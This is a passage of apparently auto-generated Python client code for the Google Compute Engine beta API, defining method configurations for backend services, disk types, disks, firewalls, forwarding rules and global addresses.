config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.backendServices.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/backendServices',
request_field='',
request_type_name=u'ComputeBackendServicesAggregatedListRequest',
response_type_name=u'BackendServiceAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified BackendService resource.
Args:
request: (ComputeBackendServicesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.backendServices.delete',
ordered_params=[u'project', u'backendService'],
path_params=[u'backendService', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendServices/{backendService}',
request_field='',
request_type_name=u'ComputeBackendServicesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DeleteSignedUrlKey(self, request, global_params=None):
"""Deletes the given Signed URL Key from the specified backend service.
Args:
request: (ComputeBackendServicesDeleteSignedUrlKeyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DeleteSignedUrlKey')
return self._RunMethod(
config, request, global_params=global_params)
DeleteSignedUrlKey.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendServices.deleteSignedUrlKey',
ordered_params=[u'project', u'backendService', u'keyName'],
path_params=[u'backendService', u'project'],
query_params=[u'keyName', u'requestId'],
relative_path=u'projects/{project}/global/backendServices/{backendService}/deleteSignedUrlKey',
request_field='',
request_type_name=u'ComputeBackendServicesDeleteSignedUrlKeyRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified BackendService resource. Get a list of available backend services by making a list() request.
Args:
request: (ComputeBackendServicesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendService) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.backendServices.get',
ordered_params=[u'project', u'backendService'],
path_params=[u'backendService', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendServices/{backendService}',
request_field='',
request_type_name=u'ComputeBackendServicesGetRequest',
response_type_name=u'BackendService',
supports_download=False,
)
def GetHealth(self, request, global_params=None):
"""Gets the most recent health check results for this BackendService.
Args:
request: (ComputeBackendServicesGetHealthRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendServiceGroupHealth) The response message.
"""
config = self.GetMethodConfig('GetHealth')
return self._RunMethod(
config, request, global_params=global_params)
GetHealth.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendServices.getHealth',
ordered_params=[u'project', u'backendService'],
path_params=[u'backendService', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendServices/{backendService}/getHealth',
request_field=u'resourceGroupReference',
request_type_name=u'ComputeBackendServicesGetHealthRequest',
response_type_name=u'BackendServiceGroupHealth',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a BackendService resource in the specified project using the data included in the request. There are several restrictions and guidelines to keep in mind when creating a backend service. Read Restrictions and Guidelines for more information.
Args:
request: (ComputeBackendServicesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendServices.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendServices',
request_field=u'backendService',
request_type_name=u'ComputeBackendServicesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of BackendService resources available to the specified project.
Args:
request: (ComputeBackendServicesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendServiceList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.backendServices.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/backendServices',
request_field='',
request_type_name=u'ComputeBackendServicesListRequest',
response_type_name=u'BackendServiceList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Patches the specified BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeBackendServicesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.backendServices.patch',
ordered_params=[u'project', u'backendService'],
path_params=[u'backendService', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendServices/{backendService}',
request_field=u'backendServiceResource',
request_type_name=u'ComputeBackendServicesPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetSecurityPolicy(self, request, global_params=None):
"""Sets the security policy for the specified backend service.
Args:
request: (ComputeBackendServicesSetSecurityPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetSecurityPolicy')
return self._RunMethod(
config, request, global_params=global_params)
SetSecurityPolicy.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendServices.setSecurityPolicy',
ordered_params=[u'project', u'backendService'],
path_params=[u'backendService', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendServices/{backendService}/setSecurityPolicy',
request_field=u'securityPolicyReference',
request_type_name=u'ComputeBackendServicesSetSecurityPolicyRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeBackendServicesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendServices.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/backendServices/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeBackendServicesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information.
Args:
request: (ComputeBackendServicesUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.backendServices.update',
ordered_params=[u'project', u'backendService'],
path_params=[u'backendService', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendServices/{backendService}',
request_field=u'backendServiceResource',
request_type_name=u'ComputeBackendServicesUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class DiskTypesService(base_api.BaseApiService):
"""Service class for the diskTypes resource."""
_NAME = u'diskTypes'
def __init__(self, client):
super(ComputeBeta.DiskTypesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of disk types.
Args:
request: (ComputeDiskTypesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskTypeAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.diskTypes.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/diskTypes',
request_field='',
request_type_name=u'ComputeDiskTypesAggregatedListRequest',
response_type_name=u'DiskTypeAggregatedList',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified disk type. Get a list of available disk types by making a list() request.
Args:
request: (ComputeDiskTypesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskType) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.diskTypes.get',
ordered_params=[u'project', u'zone', u'diskType'],
path_params=[u'diskType', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/diskTypes/{diskType}',
request_field='',
request_type_name=u'ComputeDiskTypesGetRequest',
response_type_name=u'DiskType',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of disk types available to the specified project.
Args:
request: (ComputeDiskTypesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskTypeList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.diskTypes.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/diskTypes',
request_field='',
request_type_name=u'ComputeDiskTypesListRequest',
response_type_name=u'DiskTypeList',
supports_download=False,
)
class DisksService(base_api.BaseApiService):
"""Service class for the disks resource."""
_NAME = u'disks'
def __init__(self, client):
super(ComputeBeta.DisksService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of persistent disks.
Args:
request: (ComputeDisksAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.disks.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/disks',
request_field='',
request_type_name=u'ComputeDisksAggregatedListRequest',
response_type_name=u'DiskAggregatedList',
supports_download=False,
)
def CreateSnapshot(self, request, global_params=None):
"""Creates a snapshot of a specified persistent disk.
Args:
request: (ComputeDisksCreateSnapshotRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('CreateSnapshot')
return self._RunMethod(
config, request, global_params=global_params)
CreateSnapshot.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.disks.createSnapshot',
ordered_params=[u'project', u'zone', u'disk'],
path_params=[u'disk', u'project', u'zone'],
query_params=[u'guestFlush', u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/disks/{disk}/createSnapshot',
request_field=u'snapshot',
request_type_name=u'ComputeDisksCreateSnapshotRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified persistent disk. Deleting a disk removes its data permanently and is irreversible. However, deleting a disk does not delete any snapshots previously made from the disk. You must separately delete snapshots.
Args:
request: (ComputeDisksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.disks.delete',
ordered_params=[u'project', u'zone', u'disk'],
path_params=[u'disk', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/disks/{disk}',
request_field='',
request_type_name=u'ComputeDisksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns a specified persistent disk. Get a list of available persistent disks by making a list() request.
Args:
request: (ComputeDisksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Disk) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.disks.get',
ordered_params=[u'project', u'zone', u'disk'],
path_params=[u'disk', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/disks/{disk}',
request_field='',
request_type_name=u'ComputeDisksGetRequest',
response_type_name=u'Disk',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a persistent disk in the specified project using the data in the request. You can create a disk with a sourceImage, a sourceSnapshot, or create an empty 500 GB data disk by omitting all properties. You can also create a disk that is larger than the default size by specifying the sizeGb property.
Args:
request: (ComputeDisksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.disks.insert',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'requestId', u'sourceImage'],
relative_path=u'projects/{project}/zones/{zone}/disks',
request_field=u'disk',
request_type_name=u'ComputeDisksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of persistent disks contained within the specified zone.
Args:
request: (ComputeDisksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.disks.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/disks',
request_field='',
request_type_name=u'ComputeDisksListRequest',
response_type_name=u'DiskList',
supports_download=False,
)
def Resize(self, request, global_params=None):
"""Resizes the specified persistent disk. You can only increase the size of the disk.
Args:
request: (ComputeDisksResizeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Resize')
return self._RunMethod(
config, request, global_params=global_params)
Resize.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.disks.resize',
ordered_params=[u'project', u'zone', u'disk'],
path_params=[u'disk', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/disks/{disk}/resize',
request_field=u'disksResizeRequest',
request_type_name=u'ComputeDisksResizeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on a disk. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeDisksSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.disks.setLabels',
ordered_params=[u'project', u'zone', u'resource'],
path_params=[u'project', u'resource', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/disks/{resource}/setLabels',
request_field=u'zoneSetLabelsRequest',
request_type_name=u'ComputeDisksSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeDisksTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.disks.testIamPermissions',
ordered_params=[u'project', u'zone', u'resource'],
path_params=[u'project', u'resource', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/disks/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeDisksTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class FirewallsService(base_api.BaseApiService):
"""Service class for the firewalls resource."""
_NAME = u'firewalls'
def __init__(self, client):
super(ComputeBeta.FirewallsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified firewall.
Args:
request: (ComputeFirewallsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.firewalls.delete',
ordered_params=[u'project', u'firewall'],
path_params=[u'firewall', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/firewalls/{firewall}',
request_field='',
request_type_name=u'ComputeFirewallsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified firewall.
Args:
request: (ComputeFirewallsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Firewall) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.firewalls.get',
ordered_params=[u'project', u'firewall'],
path_params=[u'firewall', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/firewalls/{firewall}',
request_field='',
request_type_name=u'ComputeFirewallsGetRequest',
response_type_name=u'Firewall',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a firewall rule in the specified project using the data included in the request.
Args:
request: (ComputeFirewallsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.firewalls.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/firewalls',
request_field=u'firewall',
request_type_name=u'ComputeFirewallsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of firewall rules available to the specified project.
Args:
request: (ComputeFirewallsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(FirewallList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.firewalls.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/firewalls',
request_field='',
request_type_name=u'ComputeFirewallsListRequest',
response_type_name=u'FirewallList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates the specified firewall rule with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeFirewallsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.firewalls.patch',
ordered_params=[u'project', u'firewall'],
path_params=[u'firewall', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/firewalls/{firewall}',
request_field=u'firewallResource',
request_type_name=u'ComputeFirewallsPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeFirewallsTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.firewalls.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/firewalls/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeFirewallsTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified firewall rule with the data included in the request. The PUT method can only update the following fields of firewall rule: allowed, description, sourceRanges, sourceTags, targetTags.
Args:
request: (ComputeFirewallsUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.firewalls.update',
ordered_params=[u'project', u'firewall'],
path_params=[u'firewall', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/firewalls/{firewall}',
request_field=u'firewallResource',
request_type_name=u'ComputeFirewallsUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class ForwardingRulesService(base_api.BaseApiService):
"""Service class for the forwardingRules resource."""
_NAME = u'forwardingRules'
def __init__(self, client):
super(ComputeBeta.ForwardingRulesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of forwarding rules.
Args:
request: (ComputeForwardingRulesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ForwardingRuleAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.forwardingRules.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/forwardingRules',
request_field='',
request_type_name=u'ComputeForwardingRulesAggregatedListRequest',
response_type_name=u'ForwardingRuleAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified ForwardingRule resource.
Args:
request: (ComputeForwardingRulesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.forwardingRules.delete',
ordered_params=[u'project', u'region', u'forwardingRule'],
path_params=[u'forwardingRule', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/forwardingRules/{forwardingRule}',
request_field='',
request_type_name=u'ComputeForwardingRulesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified ForwardingRule resource.
Args:
request: (ComputeForwardingRulesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ForwardingRule) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.forwardingRules.get',
ordered_params=[u'project', u'region', u'forwardingRule'],
path_params=[u'forwardingRule', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/forwardingRules/{forwardingRule}',
request_field='',
request_type_name=u'ComputeForwardingRulesGetRequest',
response_type_name=u'ForwardingRule',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a ForwardingRule resource in the specified project and region using the data included in the request.
Args:
request: (ComputeForwardingRulesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.forwardingRules.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/forwardingRules',
request_field=u'forwardingRule',
request_type_name=u'ComputeForwardingRulesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of ForwardingRule resources available to the specified project and region.
Args:
request: (ComputeForwardingRulesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ForwardingRuleList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.forwardingRules.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/forwardingRules',
request_field='',
request_type_name=u'ComputeForwardingRulesListRequest',
response_type_name=u'ForwardingRuleList',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on the specified resource. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeForwardingRulesSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.forwardingRules.setLabels',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/forwardingRules/{resource}/setLabels',
request_field=u'regionSetLabelsRequest',
request_type_name=u'ComputeForwardingRulesSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetTarget(self, request, global_params=None):
"""Changes target URL for forwarding rule. The new target should be of the same type as the old target.
Args:
request: (ComputeForwardingRulesSetTargetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetTarget')
return self._RunMethod(
config, request, global_params=global_params)
SetTarget.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.forwardingRules.setTarget',
ordered_params=[u'project', u'region', u'forwardingRule'],
path_params=[u'forwardingRule', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/forwardingRules/{forwardingRule}/setTarget',
request_field=u'targetReference',
request_type_name=u'ComputeForwardingRulesSetTargetRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeForwardingRulesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.forwardingRules.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/forwardingRules/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeForwardingRulesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class GlobalAddressesService(base_api.BaseApiService):
"""Service class for the globalAddresses resource."""
_NAME = u'globalAddresses'
def __init__(self, client):
super(ComputeBeta.GlobalAddressesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified address resource.
Args:
request: (ComputeGlobalAddressesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.globalAddresses.delete',
ordered_params=[u'project', u'address'],
path_params=[u'address', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/addresses/{address}',
request_field='',
request_type_name=u'ComputeGlobalAddressesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified address resource. Get a list of available addresses by making a list() request.
Args:
request: (ComputeGlobalAddressesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Address) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalAddresses.get',
ordered_params=[u'project', u'address'],
path_params=[u'address', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/addresses/{address}',
request_field='',
